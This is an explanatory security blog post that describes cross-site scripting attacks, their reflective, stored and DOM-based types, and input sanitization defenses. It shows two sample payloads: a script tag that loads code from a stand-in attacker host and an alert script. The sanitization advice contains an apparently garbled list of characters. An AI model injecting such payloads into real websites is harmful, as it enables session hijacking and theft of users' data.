Bitdefender Completes Acquisition of Horangi Cyber Security
logo

EN

Products +

Services +

Customers +

Partners +

Resources +

Careers
Sign InContact Us

What Is Cross-Site Scripting (XSS)?

Cross-Site Scripting (XSS) attacks are consistently featured in the OWASP Top 10 list. In this post, we talk about what it is, what can happen to your data, and what you should do about it.

Samantha CruzSamantha Cruz

What Is A Cross-Site Scripting (XSS) Attack?

Cross-Site Scripting (XSS) is a type of client-side injection attack where a malicious script is injected and allowed to run in a legitimate website. An attack starts when the user visits the website with the malicious code.

Categories of websites vulnerable to XSS attacks include message boards and any website that allows user comments. XSS scripts are typically written in JavaScript, VBScript, Flash, or even CSS.

XSS Attack Examples

The <script> tag attack is the most straightforward example of a XSS payload. A script tag can reference external JavaScript code, or you can embed the code within the script tag itself. For instance:

<!-- External script -->

<script src=http://hacker.com/hacked.js></script>

<!-- Embedded script -->

<script> alert("HACKED!!!");</script>

A common use case for an XSS attack is for the attacker to be able to control their victim’s web browser or account. As this attack is executed within a browser session, this allows them to bypass typical security defenses.

XSS attacks are perceived to be a little less dangerous than SQL injection attacks, but once a XSS attack is successfully executed , the attacker can do one of the following things:

  • Send arbitrary HTTP requests to various locations of the attacker’s choosing.
  • Use HTML5 APIs to access things like geo-location, microphone, and webcam.
  • Access a user’s session and cookies. The attacker can then impersonate the user and gain access to the same data the user does.
  • Deface websites and perform Denial of Service (DoS) attacks.

A XSS attack is especially powerful when combined with social engineering attacks. With more access, the attacker can then perform advanced attacks like malware injection, phishing, and identity theft.

Types of XSS Attacks

Reflective XSS

A reflective XSS attack, also known as a non-persistent XSS attack, is an attack where the malicious script runs from another website through the web browser. Because this is passed through a query typically in the URL, starting the attack is as simple as leveraging social engineering trickery to bamboozle the user into clicking a link.

Reflective XSS attacks are the most common XSS type, but also the easiest type to avoid, since user interaction is needed for the attack to commence. For this reason, attackers send malicious content to as many users as possible for more chances of a successful attack.

Persistent XSS

Meanwhile, a persistent XSS, also known as a stored XSS attack, is the more dangerous XSS attack type. This type of attack happens when the web application stores user input for later use and then serves them to other users.

Persistent XSS is more dangerous because unlike Reflective XSS attacks, which require the user to interact with the XSS trigger, a persistent XSS only requires a visit to the malicious webpage.

DOM-Based XSS

Document Object Model (DOM)-based XSS attacks are a type of XSS that has payloads found in the DOM rather than within the HTML code.

The DOM is an interface for HTML and XML files that represents data that comprise HTML or XML documents, which can then be modified and manipulated using a scripting language such as JavaScript.

Unlike Reflective and Persistent XSS, which are exploited through vulnerabilities on the server-side scripts, DOM-based XSS attacks are exploited through vulnerabilities in the client-side code.

XSS Protection

Web applications are vulnerable to XSS when they do not sanitize and validate user input. Sanitizing user input means scrubbing the input clean of anything that can potentially exploit vulnerabilities. Common ways of sanitizing input include removing characters like "and" and other similar characters.

Input validation is another important step in avoiding XSS attacks. This prevents users from entering certain characters by denying a request whenever risky inputs are detected.

On the user side, education and vigilance are still the most effective ways of preventing XSS attacks. Since the most effective of XSS attacks are best combined with social engineering techniques, educated users can neutralize even the most sophisticated of XSS attacks.

Closing Thoughts

The cost of one XSS attack exceeds the investments you make to protect your assets. Before you take the first steps to protect your employees and digital assets, learn about the common cyber threats today and the top cyber risks that your organization faces. Once you’ve done that, you can then build a unique strategy that suits your organization's needs.

Samantha Cruz
Samantha Cruz

Samantha Cruz is a Cyber Security Engineer specializing in cloud security and compliance. Prior to joining Horangi, she has worked for Trend Micro and Pandora Security Labs.